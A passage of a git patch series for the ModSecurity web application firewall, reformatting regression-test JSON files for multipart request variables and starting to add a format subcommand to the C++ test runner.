form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "This is another very small test file..\r\n", + "----------------------------756b6d74fa1a8ee2--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Target value: \"1\" \\(Variable: MULTIPART_CRLF_LF_LINES\\)" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_CRLF_LF_LINES \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" + ] + } +] + diff --git a/test/test-cases/regression/variable-MULTIPART_FILENAME.json b/test/test-cases/regression/variable-MULTIPART_FILENAME.json index 1e83a7d849..95511e0a13 100644 --- a/test/test-cases/regression/variable-MULTIPART_FILENAME.json +++ b/test/test-cases/regression/variable-MULTIPART_FILENAME.json @@ -1,121 +1,121 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_FILENAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"name\"\n", - "\n", - "test\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", - "Content-Type: text/plain\n", - "\n", - "This is a very small test file..\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", - "Content-Type: text/plain\n", - "\n", - "This is another very small test file..\n", - "----------------------------756b6d74fa1a8ee2--\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Target value: \"small_text_file.txt\" \\(Variable: MULTIPART_FILENAME" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_FILENAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"name\"\n", - "\n", - "test\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", - "Content-Type: text/plain\n", - "\n", - "This is a very small test file..\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\r\n", - "Content-Type: text/plain\r\n", - "\r\n", - "This is another very small test file..\r\n", - "----------------------------756b6d74fa1a8ee2--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Target value: \"small_text_file2.txt\" \\(Variable: MULTIPART_FILENAME" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" - ] - } -] - +[ + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_FILENAME", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Target value: \"small_text_file.txt\" \\(Variable: MULTIPART_FILENAME" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_FILENAME", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file2.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "This is another very small test file..\r\n", + "----------------------------756b6d74fa1a8ee2--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Target value: \"small_text_file2.txt\" \\(Variable: MULTIPART_FILENAME" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_FILENAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" + ] + } +] + diff --git a/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json b/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json index dd196a41cb..01424f2c19 100644 --- a/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json +++ b/test/test-cases/regression/variable-MULTIPART_INVALID_HEADER_FOLDING.json @@ -1,61 +1,61 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_INVALID_HEADER_FOLDING", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data;\n", - " name=\"a\"\n", - "\n", - "1\n", - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data;\n", - " name=\"b\"\n", - "\n", - "2\n", - "-------------------------------69343412719991675451336310646--\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"ARGS:a" - }, - "rules":[ - "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", - "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", - "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", - "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"", - "SecRule ARGS \"@eq 1\" \"phase:2,deny,status:403,id:5000277\"" - ] - } -] - +[ + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_INVALID_HEADER_FOLDING", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data;\n", + " name=\"a\"\n", + "\n", + "1\n", + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data;\n", + " name=\"b\"\n", + "\n", + "2\n", + "-------------------------------69343412719991675451336310646--\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"ARGS:a" + }, + "rules":[ + "SecRule MULTIPART_STRICT_ERROR \"!@eq 1\" \"phase:2,deny,status:403,id:500074\"", + "SecRule MULTIPART_HEADER_FOLDING \"!@eq 1\" \"phase:2,deny,status:403,id:500075\"", + "SecRule MULTIPART_INVALID_HEADER_FOLDING \"!@eq 0\" \"phase:2,deny,status:403,id:500076\"", + "SecRule REQBODY_PROCESSOR_ERROR \"@eq 1\" \"phase:2,deny,status:403,id:500077\"", + "SecRule ARGS \"@eq 1\" \"phase:2,deny,status:403,id:5000277\"" + ] + } +] + diff --git a/test/test-cases/regression/variable-MULTIPART_NAME.json b/test/test-cases/regression/variable-MULTIPART_NAME.json index 63e5f629e1..4262582379 100644 --- a/test/test-cases/regression/variable-MULTIPART_NAME.json +++ b/test/test-cases/regression/variable-MULTIPART_NAME.json @@ -1,121 +1,121 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_FILENAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"name\"\n", - "\n", - "test\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", - "Content-Type: text/plain\n", - "\n", - "This is a very small test file..\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", - "Content-Type: text/plain\n", - "\n", - "This is another very small test file..\n", - "----------------------------756b6d74fa1a8ee2--\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Target value: \"filedata\" \\(Variable: MULTIPART_NAME" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_FILENAME", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"name\"\n", - "\n", - "test\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", - "Content-Type: text/plain\n", - "\n", - "This is a very small test file..\n", - "----------------------------756b6d74fa1a8ee2\n", - "Content-Disposition: form-data; name=\"filedata2\"; filename=\"small_text_file2.txt\"\r\n", - "Content-Type: text/plain\r\n", - "\r\n", - "This is another very small test file..\r\n", - "----------------------------756b6d74fa1a8ee2--\r\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "debug_log":"Target value: \"filedata2\" \\(Variable: MULTIPART_NAME" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" - ] - } -] - +[ + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_FILENAME", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is another very small test file..\n", + "----------------------------756b6d74fa1a8ee2--\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Target value: \"filedata\" \\(Variable: MULTIPART_NAME" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_FILENAME", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"name\"\n", + "\n", + "test\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata\"; filename=\"small_text_file.txt\"\n", + "Content-Type: text/plain\n", + "\n", + "This is a very small test file..\n", + "----------------------------756b6d74fa1a8ee2\n", + "Content-Disposition: form-data; name=\"filedata2\"; filename=\"small_text_file2.txt\"\r\n", + "Content-Type: text/plain\r\n", + "\r\n", + "This is another very small test file..\r\n", + "----------------------------756b6d74fa1a8ee2--\r\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "debug_log":"Target value: \"filedata2\" \\(Variable: MULTIPART_NAME" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_NAME \"@contains 0\" \"id:1,phase:3,pass,t:trim\"" + ] + } +] + diff --git a/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json b/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json index 12700963db..cef1f56801 100644 --- a/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json +++ b/test/test-cases/regression/variable-MULTIPART_PART_HEADERS.json @@ -1,218 +1,218 @@ -[ - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_PART_HEADERS (all headers)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data; name=parm1\n", - "Content-Type: image/jpeg\n", - "\n", - "1\n", - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data; name=parm2\n", - "\n", - "2\n", - "-------------------------------69343412719991675451336310646--\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log":"Variable: MULTIPART_PART_HEADERS:parm1.*Rule returned 1" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_PART_HEADERS \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_PART_HEADERS (specific header - match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data; name=parm1\n", - "Content-Type: image/jpeg\n", - "\n", - "1\n", - "-------------------------------69343412719991675451336310646\n", - "Content-Disposition: form-data; name=parm2\n", - "\n", - "2\n", - "-------------------------------69343412719991675451336310646--\n" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 403, - "debug_log":"Variable: MULTIPART_PART_HEADERS:parm1.*Rule returned 1" - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_PART_HEADERS:parm1 \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_PART_HEADERS (specific header - no match)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=parm1", - "Content-Type: image/jpeg", - "", - "1", - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=parm2", - "", - "2", - "-------------------------------69343412719991675451336310646--" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_PART_HEADERS:parm2 \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" - ] - }, - { - "enabled":1, - "version_min":300000, - "title":"Testing Variables :: MULTIPART_PART_HEADERS (check EOL)", - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"249", - "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", - "Expect":"100-continue" - }, - "uri":"/", - "method":"POST", - "body":[ - "-------------------------------69343412719991675451336310646", - "Content-Disposition: form-data; name=\"file\"; filename=\"New Text Document.txt\"", - "Content-Type: text/plain; charset=utf-8\r\n", - "", - "1", - "-------------------------------69343412719991675451336310646--" - ] - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" - }, - "body":[ - "no need." - ] - }, - "expected":{ - "http_code": 200 - }, - "rules":[ - "SecRuleEngine On", - "SecRule MULTIPART_PART_HEADERS \"@rx ^content-type\\s*+:\\s*+(.*)$\" \"id:922110,phase:2,deny,capture,t:none,t:lowercase,chain\"", - "SecRule TX:1 \"!@rx ^text/plain; charset=(?:iso-8859-15?|windows-1252|utf-8)$\" \"t:lowercase\"" - ] - } -] - +[ + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_PART_HEADERS (all headers)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm1\n", + "Content-Type: image/jpeg\n", + "\n", + "1\n", + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm2\n", + "\n", + "2\n", + "-------------------------------69343412719991675451336310646--\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log":"Variable: MULTIPART_PART_HEADERS:parm1.*Rule returned 1" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_PART_HEADERS \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_PART_HEADERS (specific header - match)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm1\n", + "Content-Type: image/jpeg\n", + "\n", + "1\n", + "-------------------------------69343412719991675451336310646\n", + "Content-Disposition: form-data; name=parm2\n", + "\n", + "2\n", + "-------------------------------69343412719991675451336310646--\n" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 403, + "debug_log":"Variable: MULTIPART_PART_HEADERS:parm1.*Rule returned 1" + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_PART_HEADERS:parm1 \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_PART_HEADERS (specific header - no match)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"330", + "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-------------------------------69343412719991675451336310646", + "Content-Disposition: form-data; name=parm1", + "Content-Type: image/jpeg", + "", + "1", + "-------------------------------69343412719991675451336310646", + "Content-Disposition: form-data; name=parm2", + "", + "2", + "-------------------------------69343412719991675451336310646--" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 200 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_PART_HEADERS:parm2 \"@rx content-type:.*jpeg\" \"phase:2,deny,status:403,id:500074,t:lowercase\"" + ] + }, + { + "enabled":1, + "version_min":300000, + "title":"Testing Variables :: MULTIPART_PART_HEADERS (check EOL)", + "client":{ + "ip":"200.249.12.31", + "port":123 + }, + "server":{ + "ip":"200.249.12.31", + "port":80 + }, + "request":{ + "headers":{ + "Host":"localhost", + "User-Agent":"curl/7.38.0", + "Accept":"*/*", + "Content-Length":"249", + "Content-Type":"multipart/form-data; boundary=-----------------------------69343412719991675451336310646", + "Expect":"100-continue" + }, + "uri":"/", + "method":"POST", + "body":[ + "-------------------------------69343412719991675451336310646", + "Content-Disposition: form-data; name=\"file\"; filename=\"New Text Document.txt\"", + "Content-Type: text/plain; charset=utf-8\r\n", + "", + "1", + "-------------------------------69343412719991675451336310646--" + ] + }, + "response":{ + "headers":{ + "Date":"Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type":"text/html" + }, + "body":[ + "no need." + ] + }, + "expected":{ + "http_code": 200 + }, + "rules":[ + "SecRuleEngine On", + "SecRule MULTIPART_PART_HEADERS \"@rx ^content-type\\s*+:\\s*+(.*)$\" \"id:922110,phase:2,deny,capture,t:none,t:lowercase,chain\"", + "SecRule TX:1 \"!@rx ^text/plain; charset=(?:iso-8859-15?|windows-1252|utf-8)$\" \"t:lowercase\"" + ] + } +] + From b1c59b72504c23e51b95c84238c11e21f22b394a Mon Sep 17 00:00:00 2001 From: Hiroaki Nakamura Date: Mon, 26 Jan 2026 00:40:39 +0900 Subject: [PATCH 04/29] Add format subcommand to regression_test --- test/common/modsecurity_test.cc | 29 ++-- test/common/modsecurity_test.h | 4 +- test/regression/regression.cc | 27 ++++ test/regression/regression_test.cc | 235 +++++++++++++++++++++++++++++ test/regression/regression_test.h | 13 ++ 5 files changed, 298 insertions(+), 10 deletions(-) diff --git a/test/common/modsecurity_test.cc b/test/common/modsecurity_test.cc index 21af285d55..73406cdd89 100644 --- a/test/common/modsecurity_test.cc +++ b/test/common/modsecurity_test.cc @@ -68,18 +68,25 @@ bool ModSecurityTest::load_test_json(const std::string &file) { return false; } - size_t num_tests = node->u.array.len; - for ( int i = 0; i < num_tests; i++ ) { - yajl_val obj = node->u.array.values[i]; - - auto u = std::unique_ptr(T::from_yajl_node(obj)); + if (m_format) { + auto u = std::unique_ptr(T::from_yajl_node(node)); u->filename = file; - const auto key = u->filename + ":" + u->name; - (*this)[key].push_back(std::move(u)); - } + (*this)[file].push_back(std::move(u)); + } else { + size_t num_tests = node->u.array.len; + for ( int i = 0; i < num_tests; i++ ) { + yajl_val obj = node->u.array.values[i]; - yajl_tree_free(node); + auto u = std::unique_ptr(T::from_yajl_node(obj)); + u->filename = file; + + const auto key = u->filename + ":" + u->name; + (*this)[key].push_back(std::move(u)); + } + + yajl_tree_free(node); + } return true; } @@ -140,6 +147,10 @@ void ModSecurityTest::cmd_options(int argc, char **argv) { i++; m_test_multithreaded = true; } + if 